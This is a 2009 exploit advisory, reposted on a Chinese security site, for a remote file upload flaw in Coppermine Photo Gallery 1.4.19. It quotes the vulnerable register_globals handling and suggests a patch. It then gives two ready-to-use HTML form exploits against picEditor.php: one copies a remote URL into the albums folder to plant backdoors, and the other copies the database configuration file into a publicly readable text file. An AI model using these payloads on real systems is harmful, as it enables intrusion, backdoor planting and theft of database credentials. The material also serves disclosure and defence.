Coppermine Photo Gallery 1.4.19 Remote PHP File Upload Vulnerability

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

Coppermine Photo Gallery 1.4.19 Remote PHP File Upload Vulnerability

来源：vfocus.net 作者：vfocus 发布时间：2009-02-02

Written By Michael Brooks
Special thanks to str0ke!


Coppermine Photo gallery - Remote PHP File Upload
Affects: v1.4.19
Homepage: http://coppermine-gallery.net/
5,239,057   downloads from sf.net!

For this attack we need register_globals=on .  The problem is that
the anti-register_globals security can be bypassed.

This is in /include/init.inc.php  starting on line 42:
$keysToSkip = array('_POST', '_GET', '_COOKIE', '_REQUEST', '_SERVER', 'HTML_SUBST');
//...
        if (is_array($_POST)) {
                foreach ($_POST as $key => $value) {
                        if (!is_array($value))
                                $_POST[$key] = strtr($value, $HTML_SUBST);
                        if (!in_array($key, $keysToSkip) && isset($$key) && ini_get('register_globals') == '1') unset($$key);
                }
        }

        if (is_array($_GET)) {
                foreach ($_GET as $key => $value) {
                        unset($_GET[$key]);
                        $_GET[strtr(stripslashes($key), $HTML_SUBST)] = strtr(stripslashes($value), $HTML_SUBST);
                        if (!in_array($key, $keysToSkip) && isset($$key) && ini_get('register_globals') == '1') unset($$key);
                }
        }

        if (is_array($_COOKIE)) {
                foreach ($_COOKIE as $key => $value) {
                        if (!in_array($key, $keysToSkip) && isset($$key) && ini_get('register_globals') == '1') unset($$key);
                }
        }
        if (is_array($_REQUEST)) {
                foreach ($_REQUEST as $key => $value) {
                        if (!is_array($value))
                                $_REQUEST[$key] = strtr($value, $HTML_SUBST);
                        if (!in_array($key, $keysToSkip) && isset($$key) && ini_get('register_globals') == '1') unset($$key);
                }
        }
	//...
	
Here is a patch that will take care of register_globals.
if(ini_get(register_globals)){
	foreach(get_defined_vars() as $var=>$val){
		//only keep superglobals we need on this whitelist,  _SESSION will take care of its self:
		if(!in_array($var,array('_POST', '_GET', '_COOKIE', '_REQUEST', '_SERVER'))){
			unset($$var);
		}
	}
}


These 2 exploits are written in HTM,   but they are NOT XSRF!  This is
a global variable manipulation issue,  you can exploit this with CURL
or whatever.

This will copy www.google.com  to
http://127.0.0.1/cpg1419/albums/test.php .  This is very useful for
uploading backdoors.
This is hijacking  a call to copy() so we need allow_url_fopen=On ,
which is default.
<html>
	<form action="http://127.0.0.1/cpg1419/picEditor.php?img_dir=http%3A%2F%2Fwww.google.com&CURRENT_PIC[filename]=/test.php"
method=post>
		<input name="save" value=1>
		<input name="keysToSkip" value=1>
		<input name="_GET" value=1>
		<input name="_REQUEST" value=1>
		<input type=submit>
	</form>
</html>


This request will copy the database connection info and make it readable here:
http://10.1.1.155/Audit/cpg1419/albums/dbinfo.txt
This attack works with allow_url_fopen=Off
<html>
	<form action="http://127.0.0.1/cpg1419/picEditor.php?img_dir=include/config.inc.php&CURRENT_PIC[filename]=/dbinfo.txt"
method=post>
		<input name="save" value=1>
		<input name="keysToSkip" value=1>
		<input name="_GET" value=1>
		<input name="_REQUEST" value=1>
		<input type=submit>
	</form>
</html>

# [2009-01-29]

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告